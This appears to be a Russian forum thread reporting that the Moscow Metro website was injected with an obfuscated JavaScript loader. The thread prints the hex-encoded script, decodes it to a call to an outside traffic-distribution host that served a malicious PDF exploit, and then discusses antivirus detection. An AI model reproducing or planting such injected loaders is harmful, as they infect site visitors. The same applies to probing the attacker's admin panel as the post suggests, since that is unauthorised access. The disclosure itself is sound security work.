|
Официальный сайт Московского метрополитена затроянили
Открываем исходный код любой страницы mosmetro.ru, в начале видим вставку Javascript кода:
Код:
<script language="javascript" src="/script.js"></script>Код:
var _0xd5c2=["\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x74\x68\x65\x74\x72\x61\x66\x2E\x6E\x65\x74\x2F\x74\x64\x73\x2F\x69\x6E\x2E\x63\x67\x69\x3F\x64\x65\x66\x61\x75\x6C\x74\x22\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xd5c2[1]](_0xd5c2[0]);Код:
<script src="http://thetraf.net/tds/in.cgi?default"></script>Для желающих покопаться в коде, вот образец JS кода и образец PDF документа. Антивирус Касперского полученный PDF детектирует как Exploit.Win32.Pidief.cyk. Остальные антивирусные продукты почти поголовно молчат — отчет VirusTotal: http://ow.ly/X63u. По данным DomainTools и WebHosting.info к данному хосту (размещённому, естественно в Китае) привязано ещё несколько доменов, предположительно для аналогичных целей. P.S. Кстати, по адресу thetraf.net/tds/admin/ находится запароленный вход в админку Sutra TDS (TDS — traffic distribution system — система распределения траффика), если кто сможет дёрнуть оттуда какие-нибудь подробности. :) © Habr. |
на пару сайтах уже встречался мне Exploit.Win32.Pidief.cyk
http://saveimg.ru/pictures/16-01-10/...d99d2b38c1.png |
nod32 не молчит.
|
Что интересно — такое уже встречалось в сети, только на главной висела гифка, обращающаяся к JS, который уже использовал уязвимость Adobe Reader (если он, конечно, был установлен).
|
У меня NOD32 молча заблочил опасное соединение, и послал всё это на...
Это лучше чем орать на всю комнату, как Касперски, "Галактеко опасносте!!!1один" |
Цитата:
|
Цитата:
|
| Время: 03:06 |